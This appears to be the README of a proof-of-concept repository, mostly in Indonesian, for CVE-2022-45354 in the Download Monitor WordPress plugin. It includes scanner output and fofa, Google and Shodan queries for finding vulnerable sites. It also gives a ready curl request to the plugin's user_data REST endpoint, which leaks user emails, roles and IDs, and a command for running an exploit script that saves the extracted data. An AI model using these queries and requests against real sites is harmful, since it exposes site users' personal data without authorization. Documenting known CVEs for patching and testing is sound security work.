CVE-2022-45354 Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API# CVE-2022-45354
### Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API (CVE-2022-45354:version)
**Detail**: **CVE-2022-45354:version** matched at http://wordpress.lan
**Protokol**: HTTP
**Full URL**: http://wordpress.lan/wp-content/plugins/download-monitor/readme.txt
**Informasi Tambahan**
| Key | Value |
| --- | --- |
| Nama | Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API |
| Tag | cve, wordpress, wp-plugin, download-monitor, medium |
| Tingkat | medium |
| Deskripsi | Plugin Download Monitor untuk WordPress rentan terhadap Paparan Informasi Sensitif dalam versi hingga, dan termasuk, 4.7.60 melalui REST API. Hal ini memungkinkan penyerang yang tidak diautentikasi mengekstrak data sensitif termasuk laporan pengguna, laporan unduhan, dan data pengguna termasuk email, peran, id, dan info lainnya (bukan kata sandi) |
| CVSS-Metrics | [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) |
| CVE-ID | [CVE-2022-45354](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2022-45354) |
| CVSS-Score | 5.40 |
| fofa-query | wp-content/plugins/download-monitor/ |
| google-query | inurl:"/wp-content/plugins/download-monitor/" |
| shodan-query | vuln:CVE-2022-45354 |
**CURL command untuk mengecek kerentanan**
```sh
curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' 'http://target.com/wp-json/download-monitor/v1/user_data'
```
**Execute Script**
<p>Penggunaan default tanpa parameter -o disimpan didalam "downloads"</p>
```sh
python3 exploit.py https://target.com -o folder_name
```
<br>
<p>Fixed by nekomatacode</p>
[4.0K] /data/pocs/6c2af9e898a619b9482d29cd7e3f778a3cd9246c
├── [3.2K] exploit,py
├── [1.0K] LICENSE
└── [1.8K] README.md
0 directories, 3 files